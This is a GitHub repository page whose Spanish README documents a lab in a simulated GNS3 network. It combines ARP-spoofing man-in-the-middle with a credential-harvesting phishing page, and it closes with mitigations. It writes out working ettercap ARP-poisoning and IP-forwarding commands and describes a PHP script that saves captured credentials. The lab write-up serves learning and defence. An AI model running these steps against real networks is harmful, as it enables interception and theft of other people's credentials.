Skip to content

diegomty/MITM

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation


🛡️ Laboratorio de Interceptación de Tráfico (MITM) y Phishing Ético

📌 1. Introducción

Este proyecto es el resultado de un proceso de autoaprendizaje y especialización en Red Team. El objetivo es documentar, de forma técnica y controlada, cómo se puede explotar la confianza del protocolo ARP dentro de una red local para interceptar credenciales de servicios que no utilizan cifrado (HTTP).

⚠️ Nota ética: Este laboratorio fue realizado exclusivamente con fines educativos, en un entorno controlado y autorizado.


🧪 2. Escenario y Requisitos

🔧 Entorno

  • GNS3 con GNS3 VM activa (mejor estabilidad)
  • Red local simulada

🧑‍💻 Dispositivos

Rol Sistema IP
Atacante Kali Linux 192.168.169.130
Víctima Windows 10 192.168.169.133
Gateway Router Cisco 192.168.169.254

🚀 3. Guía de Despliegue Paso a Paso

🔹 Paso 1: Preparación del Servidor Atacante

Creamos el entorno donde vivirá la página de phishing en Kali Linux.

mkdir ~/phish && cd ~/phish

Creamos el archivo principal del sitio web:

nano index.html

📄 Pega el código HTML del formulario y guarda (Ctrl + O, Enter, Ctrl + X)

Creamos el procesador de credenciales:

nano login.php

📄 Este script PHP almacenará las credenciales capturadas en credenciales.txt


🔹 Paso 2: Puesta en Marcha del Servidor Web

Iniciamos el servidor web en el puerto 80 para hacerlo accesible desde la red local:

sudo php -S 0.0.0.0:80

🔹 Paso 3: Configuración del Ataque MITM

Para que la víctima no pierda conectividad a Internet, debemos preparar el sistema.

✅ Activar IP Forwarding

sudo sysctl -w net.ipv4.ip_forward=1

⚔️ Envenenamiento ARP con Ettercap

Sustituye las IPs según tu entorno (Víctima // Gateway):

sudo ettercap -T -M arp:remote /192.168.169.133// /192.168.169.254// -i eth1

🔹 Paso 4: Captura y Análisis de Credenciales

  1. Desde la máquina víctima, accede a:

    http://192.168.169.130
    
  2. Introduce datos en el formulario falso.

  3. En Kali Linux, verifica la información capturada:

cat ~/phish/credenciales.txt

🔍 4. Análisis Técnico y Riesgos

Este ataque se basa en la ausencia de autenticación del protocolo ARP, lo que permite a Kali Linux posicionarse como Man-in-the-Middle entre la víctima y el gateway.

⚠️ Impacto Identificado

  • Exposición de credenciales: Los datos viajan en texto plano a través de HTTP.
  • Falta de cifrado: Demuestra por qué HTTPS (SSL/TLS) es obligatorio en la web moderna.

🛡️ 5. Mitigación y Defensa

Las siguientes medidas reducen o eliminan este tipo de ataques:

  • DAI (Dynamic ARP Inspection) Bloquea paquetes ARP falsificados en switches gestionados.
  • HSTS (HTTP Strict Transport Security) Obliga al navegador a usar HTTPS.
  • VPN corporativa Cifra el tráfico punto a punto, inutilizando la interceptación local.

🗂️ 6. Estructura del Repositorio

📁 proyecto-mitm-phishing/
│
├── 📁 src/
│   ├── index.html
│   └── login.php
│
├── 📁 assets/
│   ├── topologia-gns3.png
│   └── evidencia-wireshark.png
│
└── README.md

📚 Conclusión

Este laboratorio demuestra cómo una mala configuración de red y la ausencia de cifrado pueden comprometer información sensible, reforzando la importancia de buenas prácticas de seguridad defensiva incluso en redes locales.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors